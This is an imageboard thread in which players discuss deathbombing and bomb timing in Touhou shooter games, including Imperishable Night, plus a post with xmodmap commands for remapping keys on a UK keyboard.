You should never, ever die if your brain is keeping track of everything on the screen (all RELEVANT bullets and exactly where your hitbox is). If you're really paying attention you can kind of feel it "slip away" and you should immediately bomb. Or if your execution is not that great, and you see the gap but know you might not be precise enough.

Touhou bombing is easy-mode, the only game I've ever played where you can bomb AFTER getting hit...

>> No.2436196

You can find keycodes using xev. I use:

xmodmap -e 'keycode 94 = z'
xmodmap -e 'keycode 52 = x'
to switch to Touhou on UK keyboard mode

xmodmap -e 'keycode 94 = backslash bar'
xmodmap -e 'keycode 52 = z'
to switch back to normal

>> No.2436201

I think you're looking for 'best'.

>> No.2436206

That is terrible advice. Not only is deathbombing punished in Imperishable Night, but it's not even POSSIBLE in EVERY OTHER SHOOTER out there, so relying on deathbombing will fuck you in the ass when you actually try to play real shooters.

>> No.2436211

If you play as Reimu you've got enough time to deathbomb from the sound in all the Touhous.

>> No.2436253

Protip: If you don't deathbomb properly in IN, you'll consume 2 bombs instead of 1.

People seem to confuse IN's deathbombing and last spells.

Last spell = 2 bombs (large window).
Deathbomb = 1 bomb (regular window).

If you want to practice deathbombing, play MoF or SA, since you'll have much more to your disposal. Note that it's only really possible to deathbomb reliably if you actually see the bullet coming towards you and know it's going to hit you.

>> No.2436255

I don't think you read the post you quoted.

>> No.2436257

If you play as Reimu in IN, you can get hit, go "aww man that sucks", get up, go smoke and reflect upon your poor dodging skills, then come back and press the button to deathbomb. That doesn't mean it's a good idea to rely on it.

>> No.2436263

actually deathbomb is usually used for the 2 bomb spell.
If you bomb exactly while hit it's a counterbomb, and it actually works in IN too, if you're fast enough.

>> No.2436272

Yes, this is truth. Bomb visually based on threats. Hell I can't deathbomb by sound alone except with IN border/ghost team and I'm creeping up on lunatic skill now so it's not very important that you learn to do that.

>> No.2436308

>Touhou bombing is easy-mode, the only game I've ever played where you can bomb AFTER getting hit...
Yeah when I play other games now I keep bombing like 5 frames too late. I start to hit the key before I die, but by the time it's all done I've exploded and argh the rage

>> No.2436552

I have to agree with you here. 0.8 seems fucking ridiculous to me. At least it costs you 2 bombs.
0.3 is where the fun is.
